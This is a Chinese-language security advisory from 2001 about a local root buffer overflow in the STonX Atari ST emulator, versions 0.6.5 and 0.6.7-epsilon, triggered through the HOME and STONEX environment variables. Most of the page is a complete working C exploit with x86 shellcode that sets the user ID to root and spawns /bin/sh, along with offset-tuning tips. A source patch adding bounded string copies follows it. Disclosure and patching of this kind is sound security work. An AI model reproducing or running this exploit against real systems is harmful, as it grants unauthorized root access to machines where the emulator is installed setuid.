STonX漏洞开发代码已发布(HOME和STONEX环境变量)

/ns/ld/unix/data/20010303061416.htm

发布日期：2001-1-3
摘要:
STonX是Unix/X和SVGAlib(附带DOS和Win32程序)的一个Atari ST仿真器. 其中有一个漏洞允许执行任意命令获得root权限.

细节:
受影响系统:
STonX version 0.6.5
STonX version 0.6.7-epsilon

漏洞开发代码:
/* (STonX [0.6.7]?[0.6.5]) local root buffer overflow exploit. - {x86}.
*
* Author: Cody Tubbs (loophole of hhp).
* www.hhp-programming.net / pigspigs@yahoo.com
* 12/27/2000
*
* STonX is the Atari ST Emulator for Unix/X.
* Current release is 0.6.5.
* Current pre-release is 0.6.7-epsilon.
*
* Tested on 0.6.7-epsilon via Slackware Linux 7.0.
* Same bug is within 0.6.5, it will work as well most likely.
*
* Will gain UID=0 when STonX is suid root.
*

#include <stdio.h>

#define PATH "/usr/X11R6/bin/stonx" // Change if needed.
#define OFFSET -7342 // Worked for me, brute if fails.
#define ALLIGN 1 // Should not need to be change.
#define NOP 0x90
#define DBUF 800

static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x66\x31"
"\xc0\x66\x31\xdb\xb0\x2e\xcd\x80\xeb\x1f"
"\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh\x69";

long get_sp(void){__asm__("movl %esp,%eax");}

void workit(char *heh){
fprintf(stderr, "(STonX [0.6.7]?[0.6.5]) Local root exploit - {x86}.\n");
fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n");
fprintf(stderr, "Usage: %s [offset] [allign(0..3)]\n", heh);
}

main(int argc, char **argv){
char eipeip[DBUF], buffer[4096], heh[DBUF+1];
int i, offset, gid, allign;
long address;
workit(argv[0]);
if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
address=get_sp()-offset;
if(allign>0){for(i=0;i<allign;i++){eipeip[i]=0x69;}}//0x69.DOOT:D
for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){buffer[i]=NOP;}
memcpy(eipeip,"HOME=",5);
putenv(eipeip);
memcpy(buffer+i,shellcode,strlen(shellcode));
memcpy(buffer,"STONEX=",7);
putenv(buffer);
fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allig
n);
execlp(PATH,"stonx",0);
}

Patch:
--- old/main.c Sun Dec 31 18:40:14 2000
+++ new/main.c Sun Dec 31 18:41:28 2000
@@ -290,9 +290,9 @@
{ char *home;
if ((home=getenv("HOME")) != NULL)
{ FILE *rc;
- char stonxrc[256];
- strcpy (stonxrc,home);
- strcat (stonxrc,"/"STONXRC);
+ char stonxrc[512+1];
+ strncpy(stonxrc,home,502);
+ strncat(stonxrc,"/"STONXRC,10);//STONXRC=".stonxrc"
if ((rc=fopen(stonxrc,"r")) != NULL)
{ int i,c=1;
char *args[64];